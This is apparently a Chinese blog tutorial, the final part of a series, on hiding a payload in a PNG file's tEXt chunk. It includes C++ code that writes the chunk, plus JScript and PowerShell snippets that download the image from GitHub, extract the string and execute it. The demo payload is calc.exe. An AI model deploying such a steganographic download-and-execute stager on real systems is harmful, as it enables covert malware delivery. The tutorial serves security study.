隐写技巧——利用PNG文件格式隐藏Payload(四)

关注 2017-01-03 15:13:17 查看数 6705 ,评论数 0 专题
承接《隐写技巧——利用PNG文件格式隐藏Payload(三)》
      Crc^= 0xFFFFFFFF;     

            returnCrc;        

}       

void convertStrToUnChar(char* str, unsignedchar* UnChar)  

{  

            inti = strlen(str), j = 0, counter = 0;  

            charc[2];  

            unsignedint bytes[2];  

  

            for(j = 0; j < i; j += 2)   

            {  

                        if(0== j % 2)  

                        {  

                                    c[0]= str[j];  

                                    c[1]= str[j + 1];  

                                    sscanf(c,"%02x" , &bytes[0]);  

                                    UnChar[counter]= bytes[0];  

                                    counter++;  

                        }  

            }  

            return;  

}    


void AddPayload(FILE *fp)

{

            char*Payload="calc.exe";

            unsignedchar *buf;

            intlen;

            intcrc32;

            len=strlen(Payload); 

            buf=newunsigned char[len+12];

            buf[0]=len>>24&0xff;

            buf[1]=len>>16&0xff;

            buf[2]=len>>8&0xff;

            buf[3]=len&0xff;

            buf[4]='t';

            buf[5]='E';

            buf[6]='X';

            buf[7]='t';

            for(intj=0;j<len;j++)

                        buf[j+8]=Payload[j];

            buf[len+8]=0XFA;

            buf[len+9]=0XC4;

            buf[len+10]=0X08;

            buf[len+11]=0X76;

            fwrite(buf,len+12,1,fp);

}


int main(int argc, char* argv[])

{

            FILE*fp,*fpnew;   

            unsignedchar *buf=NULL;

            unsignedint len=0;

            unsignedint ChunkLen=0;

            unsignedint ChunkCRC32=0;

            unsignedint ChunkOffset=0;         

            unsignedint crc32=0;

            unsignedint i=0,j=0;

            unsignedchar Signature[8]={0x89,0x50,0x4e,0x47,0x0d,0x0a,0x1a,0x0a};          

            unsignedchar IEND[12]={0x00,0x00,0x00,0x00,0x49,0x45,0x4e,0x44,0xae,0x42,0x60,0x82};         

            

            if((fp=fopen("c:\\test\\test.png","rb+"))==NULL)

                        return0;  

            if((fpnew=fopen("c:\\test\\new.png","wb"))==NULL)

                        return0;  

            fseek(fp,0,SEEK_END);

            len=ftell(fp);

            buf=newunsigned char[len];

            fseek(fp,0,SEEK_SET);

            fread(buf,len,1,fp);

            printf("TotalLen=%d\n",len);

            printf("----------------------------------------------------\n");

            fseek(fp,8,SEEK_SET);

            ChunkOffset=8;

            i=0;

            fwrite(Signature,8,1,fpnew);

            while(1)

            {

                        i++;

                        j=0;

                        memset(buf,0,len);

                        fread(buf,4,1,fp);

                        fwrite(buf,4,1,fpnew);

                        ChunkLen=(buf[0]<<24)|(buf[1]<<16)|(buf[2]<<8)|buf[3];

                        fread(buf,4+ChunkLen,1,fp);

                        printf("[+]ChunkName:%c%c%c%c                 ",buf[0],buf[1],buf[2],buf[3]);

                        if(strncmp((char*)buf,"IHDR",4)==0|strncmp((char*)buf,"PLTE",4)==0|strncmp((char *)buf,"IDAT",4)==0)

                        {           

                                    printf("PaletteChunk\n");

 

                                    fwrite(buf,4+ChunkLen,1,fpnew);

                        }

                        else

                        {

                                    printf("AncillaryChunk\n");

                                    fseek(fpnew,-4,SEEK_CUR);

                                    j=1;

                        }

                        printf("   ChunkOffset:0x%08x       \n",ChunkOffset);

                        printf("   ChunkLen: %10d              \n",ChunkLen);

                        crc32=GetCrc32(buf,ChunkLen+4);

                        printf("   ExpectCRC32:%08X\n",crc32);

                        fread(buf,4,1,fp);

                        ChunkCRC32=(buf[0]<<24)|(buf[1]<<16)|(buf[2]<<8)|buf[3];

                        printf("   ChunkCRC32: %08X                     ",ChunkCRC32);

                        if(crc32!=ChunkCRC32)

                                    printf("[!]CRC32CheckError!\n");

                        else

                        {

                                    printf("CheckSuccess!\n\n");

                                    if(j==0)

                                                fwrite(buf,4,1,fpnew);

                        }

                        ChunkLen=ftell(fp);

                        if(ChunkLen==(len-12))

                        {

                                    printf("\n----------------------------------------------------\n");

                                    printf("TotalChunk:%d\n",i);                        

                                    break;

                        }

            }

            AddPayload(fpnew);

            fwrite(IEND,12,1,fpnew);

            fclose(fp);

            fclose(fpnew);

            return0;         

}
使用check.cpp对其进行校验,如图,校验成功 651

07 读取payload并执行

将添加payload的图片上传至github,在客户端实现读取图片解析payload并执行:

1、javascript

h = newActiveXObject("WinHttp.WinHttpRequest.5.1");

h.SetTimeouts(0, 0, 0, 0);

h.Open("GET","https://raw.githubusercontent.com/3gstudent/PNG-Steganography/master//new.png",false);

h.Send();

Data = h.ResponseText;

x=Data.indexOf("tEXt");

y=Data.indexOf("IEND");

str=Data.substring(x+4,y-8);

newActiveXObject("WScript.Shell").Run(str); 

2、powershell

$url = 'https://raw.githubusercontent.com/3gstudent/PNG-Steganography/master/new.png'

$request = New-Object System.Net.WebCLient

$bytes = $request.DownloadString($url)

$x=$bytes.indexof("tEXt")

$y=$bytes.indexof("IEND")

$str=$bytes.Substring($x+4,$y-$x-12)

Start-Process -FilePath $str
注:这里给出两种方法,仅作演示

08 小结

本文详细介绍分析了PNG文件的格式,编写程序实现以下功能: 自动解析PNG文件格式,辅助查找其中的隐藏内容 添加Payload 下载PNG图片解析并执行payload (本专题完)

*来源:RoarTalk 作者:3gstudent Mottoin整理发布

交流评论(0)
Loading...
点击 ,就能发表评论哦~如果您还没有账号,请 一个吧
css.php
正在加载中...